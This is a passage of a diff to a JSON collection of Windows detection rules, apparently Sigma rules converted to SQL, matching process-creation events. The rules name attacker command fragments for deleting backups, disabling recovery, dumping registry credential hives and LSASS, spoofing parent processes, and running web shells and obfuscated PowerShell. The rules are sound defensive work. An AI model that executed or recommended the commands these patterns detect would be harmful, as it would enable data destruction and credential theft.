LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" + "filename": "proc_creation_win_malware_wannacry.yml" }, { - "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", - "id": "52ff7941-8211-46f9-84f8-9903efb7077d", - "status": "test", - "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", + "title": "Security Privileges Enumeration Via Whoami.EXE", + "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "status": "experimental", + "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1134.004" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_selectmyparent.yml" + "filename": "proc_creation_win_whoami_priv_discovery.yml" }, { - "title": "DNS RCE CVE-2020-1350", - "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "title": "Shells Spawned by Web Servers", + "id": "8202070f-edeb-4d31-a010-a26c72ac5600", "status": "test", - "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", + "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.persistence", + "attack.t1505.003", + "attack.t1190" ], "falsepositives": [ - "Unknown but benign sub processes of the Windows DNS service dns.exe" + "Particular web applications may spawn a shell process legitimately" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\find.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hostname.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netdom.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2020_1350.yml" + "filename": "proc_creation_win_webshell_spawn.yml" }, { - "title": "Renamed Jusched.EXE Execution", - "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", - "status": "test", - "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", - "author": "Markus Neis, Swisscom", + "title": "Suspicious Parent Double Extension File Execution", + "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", + "status": "experimental", + "description": "Detect execution of suspicious double extension files in ParentCommandLine", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1036.003" + "attack.t1036.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (NewProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%.doc.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.doc.js' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_jusched.yml" + "filename": "proc_creation_win_susp_double_extension_parent.yml" }, { - "title": "Filter Driver Unloaded Via Fltmc.EXE", - "id": "4931188c-178e-4ee7-a348-39e8a7a56821", - "status": "test", - "description": "Detect filter driver unloading activity via fltmc.exe", - "author": "Nasreddine Bencherchali", + "title": "Potential Privilege Escalation To LOCAL SYSTEM", + "id": "207b0396-3689-42d9-8399-4222658efc99", + "status": "experimental", + "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_fltmc_unload_driver.yml" + "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" }, { - "title": "WhoAmI as Parameter", - "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "title": "Renamed Jusched.EXE Execution", + "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", "status": "test", - "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", + "author": "Markus Neis, Swisscom", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.execution", + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (NewProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_whoami_as_param.yml" + "filename": "proc_creation_win_renamed_jusched.yml" }, { - "title": "Potential Credential Dumping Via WER", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", - "status": "experimental", - "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", - "author": "@pbssubhash , Nasreddine Bencherchali", + "title": "SystemStateBackup Deleted Using Wbadmin.EXE", + "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "status": "test", + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" + "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" }, { - "title": "Suspicious Reg Add BitLocker", - "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "title": "HackTool - Stracciatella Execution", + "id": "7a4d9232-92fc-404d-8ce1-4c92e7caf539", "status": "experimental", - "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", - "author": "frack113", + "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.execution", + "attack.defense_evasion", + "attack.t1059", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Stracciatella.exe' ESCAPE '\\' OR OriginalFileName = 'Stracciatella.exe' OR Description = 'Stracciatella' OR (Hashes LIKE '%SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a%' ESCAPE '\\') OR sha256 IN ('9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956', 'fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a')))" ], - "filename": "proc_creation_win_reg_bitlocker.yml" + "filename": "proc_creation_win_hktl_stracciatella_execution.yml" }, { - "title": "Unusual Child Process of dns.exe", - "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", + "title": "PUA - Wsudo Suspicious Execution", + "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "status": "experimental", - "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch", + "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.privilege_escalation", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentProcessName LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dns_susp_child_process.yml" + "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" }, { - "title": "Potential BlackByte Ransomware Activity", - "id": "999e8307-a775-4d5f-addc-4855632335be", + "title": "Dumping of Sensitive Hives Via Reg.EXE", + "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", "status": "test", - "description": "Detects command line patterns used by BlackByte ransomware in different operations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" + ], "falsepositives": [ - "Unknown" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" + "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" }, { - "title": "Suspicious HWP Sub Processes", - "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", - "status": "test", - "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "title": "Suspicious Obfuscated PowerShell Code", + "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "status": "experimental", + "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1203", - "attack.t1059.003", - "attack.g0032" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\gbb.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE 